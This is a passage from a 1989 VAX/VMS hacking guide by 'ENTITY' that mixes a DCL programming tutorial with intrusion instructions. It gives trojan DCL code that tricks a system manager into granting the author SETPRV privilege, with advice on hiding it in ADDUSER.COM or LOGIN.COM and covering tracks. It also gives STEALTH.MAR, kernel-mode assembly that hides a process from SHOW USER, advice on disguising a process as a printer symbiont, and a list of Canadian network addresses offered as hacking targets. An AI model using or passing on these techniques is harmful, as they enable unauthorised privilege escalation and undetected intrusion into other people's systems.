  2368. privilege.  If he doesn't, it continues on with the normal program
  2369. (NOTES.COM;55) If the user has the SETPRV privilege, you have the program
  2370. change the protection on SYSUAF.DAT and AUTHORIZE.EXE to full World Access.
  2371. This means that you can now run AUTHORIZE from ANY ACCOUNT no matter how lowly
  2372. it is!!!  Is that awesome or what?!   Once the protection has been changed, you
  2373. can erase the notes.com;56 file and no one will ever know anything happened!
  2374. Similarly if you modified the actual DCL program, then you just copy back the
  2375. original.  Remember its extremely important to tidy up after yourself once you
  2376. are done!
  2377.  
  2378.  Here is another example, which you may want to try. First of course you MUST
  2379. check for the privileges of the user (just like in the above program), then
  2380. try:
  2381.  
  2382. $open/write file sys$scratch:adduaf.tmp
  2383. $write file "$ RUN SYS$SYSTEM:AUTHORIZE"
  2384. $write file "MODIFY NAME/PRIV=SETPRV"
  2385. $close file
  2386. $@sys$scratch:adduaf.tmp/output=sys$scratch:adduaf.dat
  2387. $del sys$scratch:adduaf.*;*
  2388.  
  2389.  
  2390. This little patch in the coding will modify your own users privileges and give
  2391. them SETPRV when the superuser executes this routine.  The trick is to hide it
  2392. within some other program so he doesn't even realize he has done anything! Of
  2393. course after the routine has been successfully executed, the original coding
  2394. should be put back.  There are many places you can put this routine, including
  2395. ADDUSER.COM (if you have write access)!  That would mean, every time the
  2396. system manager went to add a new user, he would also boost your privs! HaHa,
  2397. quite ironic eh?!  The farthest thing that he wants to do, and you make him do
  2398. it without even realizing.  Of course you should use your imagination and put
  2399. this or a similar routine in a place where it will be quickly executed.  The
  2400. longer the code stays around without being execute, the more chance that it
  2401. will be discovered.  An optimum program would be something that the
  2402. users/operators execute frequently (eg notes, mail, phone etc)  Other good
  2403. places are the LOGIN.COM and SYLOGIN.COM files.  Just remember to cover your
  2404. tracks once you're done!!
  2405.  
  2406.  This is but a brief introduction to Trojans and the like.  You should use your
  2407. own imagination to come up with other ways of making the system operators
  2408. succumb to your wishes...heh heh.
  2409.  
  2410.  
  2411. DCL PROGRAMMING
  2412. ---------------
  2413.  
  2414.  No file would be complete without at least mentioning programming Command
  2415. Procedures.  Basically, these are like BAT files from MS-DOS or script files
  2416. from UNIX.  They form a rudimentary but powerful language that allows you to
  2417. quickly create small programs to handle most simple tasks.  This section is not
  2418. intended to be a a full blown tutorial on programming in DCL, rather its an
  2419. introduction to what it is all about.
  2420.  It is quite easy to pick up programming in DCL and the best way to learn is to
  2421. have a look at some of the COM files you will find on the various VAXes that
  2422. you hack on.  By studying these, you can quickly learn the methods on how to
  2423. perform
  2424. certain routines.  Below I have listed some of the commonly needed routines
  2425. when programming in DCL:
  2426.  
  2427.  
  2428. PASSING PARAMETERS
  2429.  
  2430. Parameters can be passed to DCL programs directly from the shell in several
  2431. ways. Here are a few examples:
  2432.  
  2433. (1) @sample 24 25
  2434.  
  2435.     When you execute this, the values 24 and 25 are passed to the sample.com
  2436.     file in the variables p1 and p2 respectively. ie p1=24, p2=25
  2437.  
  2438. (2) @sample Paul Cramer
  2439.  
  2440.     p1=PAUL,  p2=CRAMER
  2441.  
  2442. (3) @sample "Paul Cramer"
  2443.  
  2444.     p1=Paul,  p2=Cramer
  2445.  
  2446. (4) name= "Paul Cramer"
  2447.     @sample 'name'
  2448.  
  2449.     This example demonstrates the method of passing predefined variables to a
  2450.     command procedure.  In this case,  p1=PAUL,  p2=CRAMER
  2451.  
  2452. (5) name ="""Paul Cramer"""
  2453.     @sample 'name'
  2454.  
  2455.     Note that passing the variable in three double-quotes preserves the case.
  2456.     p1=Paul,  p2=Cramer
  2457.  
  2458.  
  2459.  
  2460. GETTING INPUT
  2461.  
  2462.   Often it is necessary to get some sort of input from the user when executing
  2463. a command procedure.  This is performed through the INQUIRE command. Some
  2464. examples follow:
  2465.  
  2466. (1) INQUIRE variable "prompt"
  2467.  
  2468.     This will display the 'prompt' message and then wait for input.  The string
  2469.     passed is kept in 'variable'
  2470.  
  2471. (2) INQUIRE/NOPUNC variable "prompt"
  2472.  
  2473.     When you specify /NOPUNC, the prompt will NOT be followed by a colon and
  2474.     space as is the default.
  2475.  
  2476. (3) INQUIRE/LOCAL variable "prompt"
  2477.     INQUIRE/GLOBAL variable "prompt"
  2478.  
  2479.     It should be noted that if you specify /LOCAL, the variable will remain in
  2480.     the local symbol table accessible only by this particular COM file.  If on
  2481.     the other hand, you specify /GLOBAL, the variable is placed in the global
  2482.     symbol table and is made accessible to other files.
  2483.  
  2484. (4) IF pn .eqs. "" THEN INQUIRE pn "prompt"
  2485.  
  2486.     You can use this method to check if a certain variable (pn in this case) is
  2487.     null or not.  If it is, you can ask for input.
  2488.  
  2489. (5) READ/PROMPT="prompt" SYS$COMMAND variable
  2490.  
  2491.     This is another method of getting input.
  2492.  
  2493.  
  2494.  
  2495. SUPPLY INPUT FOR A PROGRAM
  2496.  
  2497. Often you may need to create a file and get input from some outside source.
  2498. Again there are several ways of doing this.  Here I will outline three
  2499. different methods:
  2500.  
  2501. FROM DATA      :- CREATE TEST.DAT
  2502.                   data line 1
  2503.                   data line 2
  2504.                        :
  2505.                        :
  2506.                     etc etc
  2507.  
  2508. FROM TERMINAL  :- DEFINE/USER_MODE SYS$INPUT SYS$COMMAND
  2509.                   CREATE TEST.DAT
  2510.  
  2511. FROM A FILE    :- DEFINE/USER_MODE SYS$INPUT TEST.INPUT
  2512.                   CREATE TEST.FILE
  2513.  
  2514.  
  2515. OUTPUTTING INFORMATION
  2516.  
  2517. In general when outputting information, you should always send it to SYS$OUTPUT
  2518. What this does is automatically write to whatever the user has defined as
  2519. SYS$OUTPUT.  It doesn't matter what type of terminal or whatever it is, but it
  2520. will send it in the correct format.  Some examples follow:
  2521.  
  2522. (1)  WRITE SYS$OUTPUT "literal text"
  2523.  
  2524.      This will print 'literal text' on your terminal.
  2525.  
  2526. (2)  WRITE SYS$OUTPUT symbol-name
  2527.  
  2528.      This will print on your terminal whatever value is held in symbol-name
  2529.  
  2530. (3)  WRITE SYS$OUTPUT "literal text ''symbol-name'  literal text"
  2531.  
  2532.      This example shows how you can mix in normal text with a variable and
  2533.      follow it by more text.
  2534.  
  2535. (4)  TYPE SYS$INPUT
  2536.      this is a sample message
  2537.      that is spread out over
  2538.      several lines.
  2539.  
  2540.      You would use this method whenever there are more than a few lines of text
  2541.      to be printed.
  2542.  
  2543.  
  2544.  
  2545. WRITING TO A FILE
  2546.  
  2547. You will find that many times when writing a COMmand procedure you will need to
  2548. save certain information to a file.  This can be accomplished with a routine
  2549. similar to:
  2550.  
  2551. OPEN/WRITE FILE TEST.DAT
  2552. WRITE:
  2553.  INQUIRE DATA "Input Data"
  2554.  IF DATA .EQS. "" THEN GOTO DONE
  2555.  WRITE FILE DATA
  2556.  GOTO WRITE
  2557. DONE:
  2558.  CLOSE FILE
  2559.  
  2560. I will give a quick breakdown of what is going on here.  First you open the
  2561. file that you want, including the /WRITE qualifier followed by the filename.
  2562. This sample program simply inputs data, writes each line to a file and exits
  2563. when the user hits RETURN on a blank line.  Simple but effective text input
  2564. facility.
  2565.  
  2566.  
  2567.  
  2568. READING A FILE
  2569.  
  2570. Once you have written a file, you will often need to read that information back
  2571. in again. For example you may keep track of when the person last ran the file.
  2572. Each time the file is run, you would save the time/date to a file, and then
  2573. read it back in, and display it on each subsequent execution.  The sample
  2574. structure of a read routine would be:
  2575.  
  2576. OPEN/READ FILE TEST.DAT
  2577. READ:
  2578.  READ/END_OF_FILE=DONE FILE DATA
  2579.       .
  2580.       .
  2581.       .
  2582.  GOTO READ
  2583. DONE:
  2584.  CLOSE FILE
  2585.  
  2586. This routine would loop and keep reading a file, one line at a time, storing
  2587. the information in DATA until the end of file is detected.
  2588.  
  2589.  
  2590.  
  2591. CONDITIONAL LOGIC
  2592.  
  2593. No programming language would be complete without the ability to perform logic.
  2594. Although it is very simplistic, it provides just enough power to handle most
  2595. simple conditions.  Some examples:
  2596.  
  2597. (1) IF p1 .EQS. "" THEN GOTO DEFAULT
  2598.  
  2599.     In this example the procedure checks to see if the parameter passed in p1
  2600.     is NULL or not.  If it is then the program branches to DEFAULT
  2601.  
  2602. (2) IF p1 .NES. 10 THEN GOTO end_label
  2603.            .
  2604.            .
  2605.            .
  2606.     END_LABEL:
  2607.  
  2608.     Here we see that if p1 does not equal 10 then the program branches to
  2609.     END_LABEL, otherwise it continues.
  2610.  
  2611. (3) COUNT = 0
  2612.     LOOP:
  2613.      COUNT=COUNT+1
  2614.         .
  2615.         .
  2616.         .
  2617.      IF COUNT .LE. 10 THEN GOTO LOOP
  2618.     EXIT
  2619.  
  2620.  
  2621.     This example shows how to establish a loop in a command procedure, using
  2622.     the symbol COUNT and an IF statement.  The IF statement checks the value
  2623.     of COUNT and performs an EXIT when the value is greater than 10
  2624.  
  2625.  
  2626. EXPRESSIONS
  2627.  
  2628.    The data operations and comparisons are listed below in order of precedence
  2629. beginning with the highest (operations and comparisons grouped together in the
  2630. table have the same precedence).
  2631.  
  2632.  
  2633.    +--------+---------------------------------------------------------+
  2634.    Operator                    Description
  2635.    +--------+---------------------------------------------------------+
  2636.       +     Indicates a positive number
  2637.       -     Indicates a negative number
  2638.    +--------+---------------------------------------------------------+
  2639.       *     Multiplies two numbers
  2640.       /     Divides two numbers
  2641.    +--------+---------------------------------------------------------+
  2642.       +     (1) Adds two numbers
  2643.             (2) Concatenates two character strings
  2644.       -     (1) Subtracts two numbers
  2645.             (2) Subtracts two character strings
  2646.    +--------+---------------------------------------------------------+
  2647.     .EQS.   Tests if two character strings are equal
  2648.     .GES.   Tests if first character string is greater than or equal
  2649.     .GTS.   Tests if first character string is greater than
  2650.     .LES.   Tests if first character string is less than or equal
  2651.     .LTS.   Tests if first character string is less than
  2652.     .NES.   Tests if two character strings are not equal
  2653.     .EQ.    Tests if two numbers are equal
  2654.     .GE.    Tests if first number is greater than or equal to
  2655.     .GT.    Tests if first number is greater than
  2656.     .LE.    Tests if first number is less than or equal to
  2657.     .LT.    Tests if first number is less than
  2658.     .NE.    Tests if two numbers are not equal
  2659.    +--------+---------------------------------------------------------+
  2660.     .NOT.   Logically negates a number
  2661.    +--------+---------------------------------------------------------+
  2662.     .AND.   Combines two numbers with a logical AND
  2663.    +--------+---------------------------------------------------------+
  2664.     .OR.    Combines two numbers with a logical OR
  2665.    +--------+---------------------------------------------------------+
  2666.  
  2667.  
  2668.  
  2669.  
  2670. LEXICAL FUNCTIONS
  2671. -----------------
  2672.  
  2673. That concludes the introduction to DCL programming.  One thing that you should
  2674. keep in mind is that many powerful string editing and environment information
  2675. commands can be accessed from COM files.  These are called the LEXICAL
  2676. functions There are too numerous to list them all here, so I will just provide
  2677. a summary of the primary lexical functions and a brief description:
  2678.  
  2679.  
  2680.  
  2681. LEXICAL       DESCRIPTION
  2682. -------------+------------------------------------------------------------------
  2683. f$cvsi       !converts character string data (signed value) to an integer
  2684. f$cvtime     !retrieves information about an absolute, combination, or delta
  2685.               time
  2686. f$cvui       !converts character string data (unsigned value) to an integer
  2687. f$directory  !returns the current default directory name string
  2688. f$edit       !edits a character string based on the edits specified
  2689. f$element    !extracts an element from a string in which the elements are
  2690.              !separated by a specified delimiter
  2691. f$environment!obtains information about the DCL command environment
  2692. f$extract    !extracts a substring from a character string expression
  2693. f$fao        !converts the control string to an ASCII string
  2694. f$file_attrib!returns attribute information for a specified file
  2695. f$getdvi     !returns parameters for a specified device
  2696. f$getjpi     !returns accounting, status and identification info for a process
  2697. f$getsyi     !returns status and identification information about local or
  2698.              !remote nodes.
  2699. f$identifer  !converts an identifier in named format to its integer equivalent
  2700. f$integer    !returns the integer equivalent of the result of an expression
  2701. f$locate     !locates a character substring within a string and returns its
  2702.              !offset within the string
  2703. f$logical    !translates a logical name and returns the equivalence name string
  2704. f$message    !returns the message text associated with a system status code
  2705. f$mode       !shows the mode in which the process is executing
  2706. f$parse      !parses a file spec and returns either the expanded file spec or
  2707.              !a particular field that you specify
  2708. f$pid        !for each invocation, returns the next PID in sequence
  2709. f$privilege  !returns a value of TRUE or FALSE depending on whether your
  2710.              !process privileges match the privileges listed in the argument
  2711. f$process    !returns the current process name string
  2712. f$search     !searches the directory and returns the full file spec for any
  2713.               file
  2714. f$setprv     !sets the specified privileges and returns the previous state
  2715. f$string     !returns the string equivalent of the result of the specified
  2716.              !expression
  2717. f$time       !returns the data and time of day in format:  dd-mm-yy hh:mm:ss.cc
  2718. f$trnlnm     !translates a logical name and returns the equivalent name string
  2719. f$type       !determines the data type of a symbol
  2720. f$user       !returns the current user identification code (UIC)
  2721. f$verify     !set or read current command procedure state
  2722. -------------+-----------------------------------------------------------------
  2723.  
  2724. This list just outlines the main lexical functions.  Within each function there
  2725. may be many more subfunctions.  If you need help on any of these functions or
  2726. their subfunctions, just type HELP lexical [lexicalname] at any DCL prompt ($)
  2727.  
  2728.  
  2729.  
  2730. ERROR MESSAGES
  2731. --------------
  2732.  
  2733.  Occasionally when you are using DCL, you will come across error messages that
  2734. are sent to you by the VAX.  Here I will give a break down of what the
  2735. different fields in the message represent and how to interpret them. First of
  2736. all, the general format of an error message is:
  2737.  
  2738. %facility-l-ident, text
  2739.  
  2740. NOTE: not all messages are ERROR messages.  Often it is only an informational
  2741.       message telling you that a certain task was successful or whatever. In
  2742.       any case here is what each field means:
  2743.  
  2744. facility  -this is the name of the facility that produced the  error (for
  2745.            example, CLI for the Command Language Interpreter).
  2746.  
  2747. l         -this is a one letter code indicating the severity of the error.
  2748.            The severities are:
  2749.  
  2750.                   I - Informational      E - Error
  2751.                   S - Success            F - Severe error
  2752.                   W - Warning
  2753.  
  2754. ident     -this is an abbreviation for the message text.
  2755.  
  2756. text      -this is a short description of the nature of the error.
  2757.  
  2758.  
  2759. Here is an example of an error message, and how to interpret it:
  2760.  
  2761. %SYSTEM-F-NOCMKRNL, operation requires CMKRNL privilege
  2762.  
  2763. The percent sign in the beginning tells you it is a system message from the VAX
  2764. the first field (SYSTEM) indicates that it is a SYSTEM error.  The second field
  2765. (F) shows that it is a severe error.  The third field (NOCMKRNL) is a short
  2766. abbreviation showing that you do not have the CMKRNL privilege, and the actual
  2767. text is followed giving the error in detail, explaining that you MUST have the
  2768. CMKRNL privilege to perform that particular command.
  2769.  
  2770. SAMPLE PROGRAMS
  2771. ---------------
  2772.  
  2773. Here I present two sample programs. One is the STEALTH assembly language
  2774. program that allows you to hide from SHOW USER.  The other program is a DCL
  2775. COM file that allows you to keep track of who is logging on and off.
  2776.  
  2777.  
  2778. WATCHDOG.COM
  2779. ------------
  2780.  
  2781.   Instead of typing the program into the VAX manually, you can just cut this
  2782. program out in your favorite text editor and save it to a file. Then at the DCL
  2783. ($) prompt type:
  2784.  
  2785. $create watchdog.com
  2786.  
  2787. Then transmit this file over your buffer.  After the file is transmitted, hit
  2788. CTRL-Z.  This will bring you back to the DCL prompt.  At this point you can now
  2789. use this file. To enable watchdog, type:
  2790.  
  2791. $@watchdog
  2792.  
  2793. Basically I wanted to present a COM file to give you an idea of how one works.
  2794. I have tried to throw in a lot of the different techniques that you can use
  2795. from COM files into this one example.  In addition to providing you with a
  2796. good example of how COM files can be manipulated, this program also serves as
  2797. a valuable utility that you can use to monitor the system that you are on.
  2798.  The idea behind watchdog is to keep track of all the people who are logging in
  2799. or out of the system. This can be a very handy tool to keep a watch out for
  2800. system operators etc. The nice thing about this program is that it runs in the
  2801. background, so that you can continue to do whatever you want.  You should note
  2802. how I go about creating another file (watch.com) from within the main watchdog
  2803. program. This of course wasn't necessary since I could have put the whole thing
  2804. into one file and you could just as easily type: spawn/nowait @watchdog, but
  2805. like I stated earlier, the intention is to give a short tutorial on some of the
  2806. techniques that you can employ.  I have also used several lexicals within the
  2807. program to give you an idea of how you can use them within your own creations.
  2808.  
  2809. NOTE: you can terminate WATCHDOG at any time by hitting CTRL-Y, and restart it
  2810.       using: @watchdog
  2811.  
  2812.  
  2813.  
  2814. ---------------------------------- cut here -----------------------------------
  2815.  
  2816. $ !WATCHDOG.COM  by ENTITY /CCC!
  2817. $ !Usage: @watchdog
  2818. $ !
  2819. $ !This handy little utility runs in the background, freeing you to perform
  2820. $ !other tasks, while at the same time keeping track of who is logging ON or
  2821.    OFF
  2822. $ !the system. It is a simple demonstration of how powerful DCL programming can
  2823. $ !be when it is used together with the lexical functions.
  2824. $ !
  2825. $ !CTRL-Y will terminate the WATCHDOG subprocess at any time.  The program
  2826. $ !also automatically terminates when you log off.
  2827. $ !
  2828. $ create watch.com
  2829. $ deck
  2830. $ on control_y then goto terminate
  2831. $ del watch.com;*
  2832. $ w := write sys$output
  2833. $ node    = f$getsyi("nodename")
  2834. $ cpu     = f$extract(1,3,f$getsyi("node_hwtype"))
  2835. $ version = f$getsyi("version")
  2836. $ boot    = f$extract(0,17,f$getsyi("boottime"))
  2837. $ w "WATCHDOG  on  ''node'  VAX-11/''cpu'  VMS ''version'"
  2838. $ w "Up since ''boot'      (c) 1989 Entity"
  2839. $ list = "watch1.dat"
  2840. $ gosub file_io
  2841. $ c1 = c
  2842. $ loop:
  2843. $ list = "watch2.dat"
  2844. $ gosub file_io
  2845. $ c2 = c
  2846. $ if c1 .eq. c2 then goto loop
  2847. $ if c2 .gt. c1 then goto newuser
  2848. $ file  = "watch1.dat"
  2849. $ file2 = "watch2.dat"
  2850. $ gosub compare
  2851. $ w "--- ''a' ---  ''timelog' "
  2852. $ goto loop
  2853. $ newuser:
  2854. $ file  = "watch2.dat"
  2855. $ file2 = "watch1.dat"
  2856. $ gosub compare
  2857. $ w "+++ ''a' +++  ''timelog' "
  2858. $ goto loop
  2859. $ !
  2860. $ ! Construct a UserList of processes currently logged in
  2861. $ !
  2862. $ file_io:
  2863. $ c = 0
  2864. $ sho users/output = watch.dat
  2865. $ open/share/read in watch.dat
  2866. $ open/share/write out 'list'
  2867. $ read in a
  2868. $ read in a
  2869. $ read in a
  2870. $ lp01:
  2871. $ read/end_of_file=fin1 in a
  2872. $ write out a
  2873. $ c = c + 1
  2874. $ goto lp01
  2875. $ fin1:
  2876. $ close in/nolog
  2877. $ close out/nolog
  2878. $ purge watch.dat
  2879. $ purge 'list'
  2880. $ return
  2881. $ !
  2882. $ ! Get a formatted output of the current TIME and DATE of LOGIN/LOGOUT
  2883. $ !
  2884. $ gettime:
  2885. $ temp = f$extract(3,3,f$time ())+" "+f$extract(0,2,f$time())+","
  2886. $ temp = temp + f$extract(7,4,f$time())+"  "+f$extract(12,5,f$time())
  2887. $ timelog = f$cvtime("today",,"weekday")+" "+temp
  2888. $ return
  2889. $ !
  2890. $ ! Compare the Userlist to a previous listing
  2891. $ !
  2892. $ compare:
  2893. $ open/share/read in 'file'
  2894. $ lp02:
  2895. $ read/end_of_file=fin2 in a
  2896. $ a=f$fao("!12AS",a)
  2897. $ set message/noid/nofac/notext/nosev
  2898. $ search 'file2' 'a'
  2899. $ chk = $severity
  2900. $ set message/id/sev/fac/text
  2901. $ if chk .eqs. "1" then goto lp02
  2902. $ fin2:
  2903. $ close in/nolog
  2904. $ gosub gettime
  2905. $ c1 = c2
  2906. $ copy watch2.dat watch1.dat
  2907. $ purge watch1.dat
  2908. $ return
  2909. $ !
  2910. $ ! Terminate process and cleanup.
  2911. $ !
  2912. $ terminate:
  2913. $ w "USER TERMINATION OF WATCHDOG!"
  2914. $ set message/nofac/noid/notext/nosev
  2915. $ del watch*.dat;*
  2916. $ set message/fac/id/text/sev
  2917. $ pid = f$getjpi("","PID")
  2918. $ stop/id='pid'
  2919. $ eod
  2920. $ spawn/nowait @watch.com
  2921. $ exit
  2922.  
  2923. ---------------------------------- cut here -----------------------------------
  2924.  
  2925.  
  2926. NOTE: Notice the little trick that I employ on the 16th line of the DCL file:
  2927.       I have the program delete itself!  This can be VERY useful in many
  2928.       applications where you don't want the program lying around after it has
  2929.       been executed once (eg. trojan horses!)
  2930.  
  2931.  
  2932.  
  2933.  
  2934. STEALTH.MAR
  2935. -----------
  2936.  
  2937.  Ok here i present the stealth.mar program.  This little assembler beauty lets
  2938. you hide from the SHOW USER command!  Very useful for remaining undetected on
  2939. VAX/VMS systems.  Ok first heres the program:
  2940.  
  2941.  
  2942.  
  2943. ---------------------------------- cut here -----------------------------------
  2944.  
  2945. .library /sys$library:lib.mlb/
  2946. .link /sys$system:sys.stb/
  2947. $pcbdef
  2948. .entry no_user,^m<>
  2949. $cmkrnl_s routin=blast_it
  2950. ret
  2951. .entry blast_it,^m<>
  2952. tstl pcb$l_owner(r4)
  2953. bneq outta_here
  2954. bbcc #pcb$v_inter,pcb$l_sts(r4),outta_here
  2955. clrb pcb$t_terminal(r4)
  2956. decw g^sys$gw_ijobcnt
  2957. bisl #pcb$m_noacnt,pcb$l_sts(r4)
  2958. outta_here:
  2959. movl #ss$_normal,r0
  2960. ret
  2961. .end no_user
  2962.  
  2963. ---------------------------------- cut here -----------------------------------
  2964.  
  2965.  
  2966. Ok heres the instructions on using it.  First create the file stealth.mar on
  2967. the VAX. This can be accomplished by:
  2968.  
  2969. $create stealth.mar
  2970.  
  2971. Then transmit this file through the buffer option in your terminal program.
  2972. After you finish the transmit, hit CTRL-Z to exit the create file option. At
  2973. this point you will be put back into DCL.  Then perform the following steps:
  2974.  
  2975. $macro stealth
  2976. $link /nomap stealth
  2977. $delete stealth.obj;*
  2978. $delete stealth.mar;*
  2979. $run stealth
  2980. $del stealth.exe;*
  2981. $show system
  2982.  
  2983. At this point, your screen will fill up, showing you all the active processes.
  2984. Make a note of the processes that have the format: "symbiont_xxxx" Look for the
  2985. last available one, then increase the number by 1.  For example if the last
  2986. symbiont process was "symbiont_0003" then you should type:
  2987.  
  2988. $set proc/name="symbiont_0004"
  2989.  
  2990. This will effectively name your process as a printer driver, thereby making it
  2991. even harder to detect you.  Of course you are not safe from the SDA (since it
  2992. can access memory directly) but it affords quite a bit of protection
  2993. nonetheless Ok one small note, you require CMKRNL privilege to execute this
  2994. file (because of the Change To Kernal Mode command in the 5th line of the
  2995. code).  One other point that I want to make is that you should NEVER leave the
  2996. .MAR or .OBJ file for STEALTH on ANY system!  The best thing is to either hide
  2997. the EXE file in some remote directory or delete it, after you execute it.  It
  2998. doesn't hurt to play it safe!
  2999.  
  3000.  
  3001. NOTE: a programming note, if you need to access the symbols defined by the
  3002.     system, such as the number of users online etc, you should link the system
  3003.       symbol table to your OBJ file. The actual file is: sys$system:sys.stb
  3004.  
  3005.  
  3006.  
  3007.  
  3008. DATAPAC VAX LISTING
  3009. -------------------
  3010.  
  3011.     Here I provided a partial list of CANADIAN VAXes hooked up on DATAPAC.
  3012. These have been provided merely as a hacking exercise to get you started, and
  3013. as such i have not listed any user/password combinations.  Some of these have
  3014. regular defaults, other have variations, and yet others require some thinking
  3015. and good luck to get in!  One small point, since all of these are Canadian
  3016. I have not bothered to include the DNIC.  So if you are calling through lets
  3017. say telenet and for example if the nua in the listing is 38701020 then to
  3018. connect to it, use the NUA 0302038701020  (ie add a 03020 to the beginning).
  3019. All of these VAXes were up and operating at the time of writing...
  3020.  
  3021. CANADIAN VAX LISTING
  3022. --------------------
  3023.  
  3024.  21700051          66200071            43700018            93800046
  3025.  76600029          62400061            87400010            91100024
  3026.  62700151          30400017            33400620            95100160
  3027.  41500778          88500561            93600010            66700024
  3028.  70700033          88500100            36700026            87400010
  3029.  85800778          76150042            36700027            90400156
  3030.  60500417          56290039            36700581            95100160
  3031.  64100146          55400127            36700178            91100024
  3032.  35600330          83500600            39100556            62700056
  3033.  44200519          49900053            36700211            59600384
  3034.  44600032          78100120            20500047            60100175
  3035.  88100073          64700253            85701445            63100131
  3036.  20500366          69200295            28330324            85701445
  3037.  44400900          97500075            28361325            63300483
  3038.  72101099          83400117            28362116            59500120
  3039.  64700029          95100160            36700140            78100265
  3040.  71100755          91100024            43700018            21450017
  3041.  53700306          49700003            54100112            93800393
  3042.  38700165          63300483            48500127            70700033
  3043.  24400263          78100651            57100010            43700230
  3044.  22500019          78100265            45800116            30500037
  3045.  68100563          78100092            54100013            37200020
  3046.  
  3047.  
  3048. CONCLUSION
  3049. ----------
  3050. Ah, that be it!  I hope you enjoyed the file and found it informative.  As i
  3051. stated earlier, it was not intended to be an advanced course on VAX hacking,
  3052. merely an introduction to whet your appetite and lead you on to bigger and
  3053. better things.  Since this file was put together in quite a hurry, i realize
  3054. that it isn't properly organized, and i am sure i forgot to mention some
  3055. important things, so i must apologize for that.  I also didn't get a chance to
  3056. verify all of the diagrams and charts I have put in (a lot of it was from
  3057. memory) but to the best of my knowledge all of this information is correct.
  3058. One minor point is that some commands may perform a bit differently on
  3059. different versions of VMS.  For example the SHOW USER output that I have
  3060. described is quite different in version 4.4 from version 5.1 The main ideas
  3061. that I have described however, apply to all versions of VMS, and you shouldn't
  3062. have any difficulties.
  3063.  
  3064. If you have any comments, suggestions, criticisms or even questions, i would be
  3065. glad to hear from you.  You can reach me in several ways.  First i can be found
  3066. on these boards:
  3067.  
  3068. CCC HQ :  (416)/398-3301    User:GUEST,  PW:GUEST
  3069. NODE 13:  (416)/756-4545    type  !!  ,login:LYNX
  3070.  
  3071. You can also reach me on QSD (France): 33-36-43-15-15, leave mail to ENTITY.
  3072. If you are calling through a Packet Switching System, then you can reach call
  3073. the QSD NUA at: 0208057040540.  You can also probably find me hanging around
  3074. on these CHAT systems:
  3075.  
  3076. TCHH  :026245400050570   login: guest
  3077. ALTGER:026245890040004   login: guest
  3078.  
  3079.  
  3080.  Now before I take off, I would like to thank some people who have made hacking
  3081. VAX/VMS possible and a helluva lot more fun for me!
  3082.  
  3083. Disk Weasel   - for getting me started into VAX/VMS hacking in the first place!
  3084.                 (thanks Catherine for introducing us!)
  3085. Jetscream     - for all the late night hacking sessions clobbering systems!
  3086. Wonder Warthog- for so freely sharing 5 billion VAX accounts with me.  The man
  3087.                 with infinite defaults..how does he do it!?...haha
  3088. The Keeper & Flex Motta- for sharing many a system with me
  3089. Rod & Scott  (SRB tech)- thanks for all the technical help!
  3090. Cottapin, Piper, Par, Snooty and the rest of the ALTOS gang for all the
  3091. interesting talks...
  3092.  
  3093. See ya around!
  3094.  
  3095. E N T I T Y
  3096.  
  3097. Corrupt Computing Canada!
  3098.  
  3099. DCL REFERENCE SECTION
  3100. ---------------------
  3101.  
  3102.   Rather than provide a DCL dictionary, I thought it would be more appropriate
  3103. for a beginners file to include a section that separates some of the more
  3104. useful commands according to function:
  3105.  
  3106. -------------------------------------------------------------------------------
  3107. 1. Submitting batch and print jobs and controlling batch and print queues.
  3108.  
  3109. ASSIGN/MERGE      Moves jobs from one queue to another.
  3110. ASSIGN/QUEUE      Assigns a queue to a device.
  3111. DEASSIGN/QUEUE    Deassigns a queue from a device.
  3112. DELETE/ENTRY      Deletes a job or jobs from a queue.
  3113. DELETE/QUEUE      Deletes a queue and all its jobs.
  3114. INITIALIZE/QUEUE  Creates and initializes a queue.
  3115. PRINT             Places a job in a print queue.
  3116. SET QUEUE         Changes the current status or attributes of a queue.
  3117. SET QUEUE/ENTRY   Changes the attributes of a job.
  3118. SHOW PRINTER      Displays default characteristics defined for a printer.
  3119. SHOW QUEUE        Displays the attributes of the jobs in a queue.
  3120. START/QUEUE       Starts or restarts a queue.
  3121. STOP/QUEUE        Stops a queue.
  3122. SUBMIT            Places a job in a batch queue.
  3123. SYNCHRONIZE       Suspends processing until a specified job completes.
  3124.  
  3125. -------------------------------------------------------------------------------
  3126. 2. Performing operations specific to command procedures.
  3127.  
  3128. DECK              Marks the beginning of a special input stream.
  3129. DELETE/SYMBOL     Deletes one or more names from a symbol table.
  3130. EOD               Marks the end of a special input stream.
  3131. EXIT              Terminates a command procedure.
  3132. GOTO              Transfers control to a label in a command procedure.
  3133. IF                Executes a command only if an expression is true.
  3134. INQUIRE           Requests input and assigns the result to a symbol.
  3135. ON                Specifies an action to perform when a condition occurs.
  3136. SET CONTROL       Controls the use of the CTRL/T and CTRL/Y keys.
  3137. SET ON            Sets error checking on or off.
  3138. SET RESTART_VALUE Sets the value of a batch job restart symbol.
  3139. SET VERIFY        Displays command input as it is read.
  3140. SHOW SYMBOL       Displays the value of a symbol.
  3141. WAIT              Suspends processing for a specified period of time.
  3142. OPEN              Makes a file available for reading or writing.
  3143. CLOSE             Terminates processing of a file.
  3144. READ              Reads and optionally deletes a record from an open file.
  3145. WRITE             Writes a record to an open file.
  3146.  
  3147. -------------------------------------------------------------------------------
  3148. 3. Communicating with other people using the system.
  3149.  
  3150. MAIL              Sends/reads messages to/from other users.
  3151. PHONE             Permits users to communicate by typing messages to
  3152.                   one another's terminal screens.
  3153. REPLY             Displays a message on one or more terminal screens.
  3154. REQUEST           Displays a message on the operator's console.
  3155. SHOW USERS        Lists the interactive users on the system.
  3156.  
  3157. -------------------------------------------------------------------------------
  3158. 4. Create and switch control between user processes.
  3159.  
  3160. LOGOUT            Terminates an interactive terminal session.
  3161. SET PASSWORD      Changes your password.
  3162. ANALYZE/PROCESS   Analyzes a process dump.
  3163. ATTACH            Switches your terminal between SPAWNed processes.
  3164. CONNECT           Connects a physical terminal to a virtual terminal.
  3165. DISCONNECT        Disconnects a physical terminal from a virtual terminal.
  3166. PRINT             Creates a print job.
  3167. RUN/PROCESS       Creates a detached process or subprocess.
  3168. SET HOST          Connects your terminal to another system via DECnet.
  3169. SHOW NETWORK      Displays the nodes you can reach from your system.
  3170. SPAWN             Creates a subprocess with a similar environment.
  3171. SUBMIT            Creates a batch job.
  3172.  
  3173. -------------------------------------------------------------------------------
  3174. 5. Creating and debugging images.
  3175.  
  3176. ANALYZE/IMAGE     Analyzes an image file.
  3177. ANALYZE/OBJECT    Analyzes an object module.
  3178. DEBUG             Invokes the symbolic debugger after a CTRL/Y.
  3179. DEPOSIT           Changes the contents of memory.
  3180. DIFFERENCES       Displays differences in content between two files.
  3181. DUMP              Displays the uninterpreted contents of a file.
